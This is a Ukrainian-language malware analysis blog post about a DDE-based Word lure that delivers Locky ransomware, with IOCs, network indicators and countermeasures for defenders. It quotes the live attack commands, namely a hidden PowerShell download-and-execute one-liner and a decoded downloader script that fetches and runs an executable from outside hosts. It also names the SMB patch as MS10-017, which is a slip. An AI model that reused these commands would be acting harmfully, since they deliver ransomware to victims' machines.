MS Office DDE як елемент доставки ШПЗ

IOC_Locky(DDE)_191017

Вчора на аналіз мені передали перший зразок документу-приманки, який використовує DDE для запуску процесу доставки Locky Ransomware.

Механізм Dynamic Data Exchange (DDE) є протоколом який дозволяє передачу даними між додатками. Він може бути застосований для створення документу Word чи Excel, при відкритті якого буде виконуватися довільний код. Вперше про практичне використання DDE було опубліковано ще 9/10/17. Це схоже на спосіб із OLE з яким ми уже мали справу (див JAR_OLE та JS_OLE), але замість вбудованого об’єкту при використанні DDE в документ “зашивається” команда на виконання тої чи іншої дії. Чому це становить небезпеку? В даному випадку в документі немає макросу, отже він має високі шанси пройти механізми фільтрації.

Рівень загрози – високий. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload вже детектуєтся по GTI.

Трохи аналітики:

В даному випадку зловмисники застосували DDE для обходу фільтрів пошти.

Для обходу блокування систем, що розповсюджують був введений проміжний список (перша команда powershell).

Для ускладнення виявлення кінцевої мети був введений проміжний downloader який оцінює систему і може не продовжити роботу.

(!)Цей зразок Locky має вбудовану можливість розповсюдження по локальній мережі через вразливість SMB (подібно до WannaCry)

Схема атаки:

email > .doc (DDE) > powershell > GET URL list > GET downloader > %temp%\*.exe > GET encoded payload > %temp%\*.exe

Маркери IOC:

File name I_141268.doc
SHA-256 4a7f805f6b8fec64d3cf07c02a1d200c703ce4cc6ddf2dabd56ad9d6c936c603
File size 13.03 KB

При відкритті файлу користувач бачить два повідомлення-попередження про “відновлення зв’язків”:

Якщо увімкнути відображення форм то можна побачити саму команду:

Якщо жертва натискає “Ок” в фоні winword.exe створює дочірній процес cmd та через нього передає команду на powershell:

WINWORD.EXE /n "C:\Users\operator\Desktop\I_213380.doc" /o "u" 

cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -e DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOg...==

Якщо декодувати отримаємо:

$urls = "h11p://shamanic-extracts.biz/eurgf837or","h11p://centralbaptistchurchnj.org/eurgf837or","","h11p://conxibit.com/eurgf837or" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Запуск цієї команди призводить до завантаження основного тіла з одної із трьох переданих адрес та запис тіла у каталог %temp%

File name eurgf837or  >>  temp\rekakva32.exe 
SHA-256 d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4
File size 113.75 KB

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

rekakva32.exe > h11p://hair-select.jp/fef44gddd.enc

File name fef44gddd.enc
SHA-256 6686965dc309055937e048e9bd13e3cbb5a97a550e2af7d86914f9241e5b033e
File size 636 KB

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename  5l46zw33.exe
SHA-256 4c054127056fb400acbab7825aa2754942121e6c49b0f82ae20e65422abdee4f
File size 636 KB

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширрення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

66.36.173.246:80    HTTP 135 ryanbaptistchurch.com GET /KJHDhbje71 HTTP/1.1

перебір джерел проміжного payload

176.103.130.130:80 HTTP 135 shamanic-extracts.biz GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 140 centralbaptistchurchnj.org GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 126 conxibit.com GET /eurgf837or HTTP/1.1

завантаження кодованого тіла Locky

180.222.185.74:80   HTTP 157 hair-select.jp GET /fef44gddd.enc HTTP/1.1

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Додаткові джерела по темі DDE

  1. Microsoft Office Attack Runs Malware Without Needing Macros
  2. Malware delivered via Necurs botnet by DDE feature in Microsoft Word
  3. How to protect yourself from exploits in Office programs
VR

Tags: , , , , , ,

3 responses to “MS Office DDE як елемент доставки ШПЗ”

  1. Денис says :

    Бачив нещодавно інформацію на інших ресурсах про даний метод доставки. Цікавить питання, чи цей зразок вже був отриманий в Україні?

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: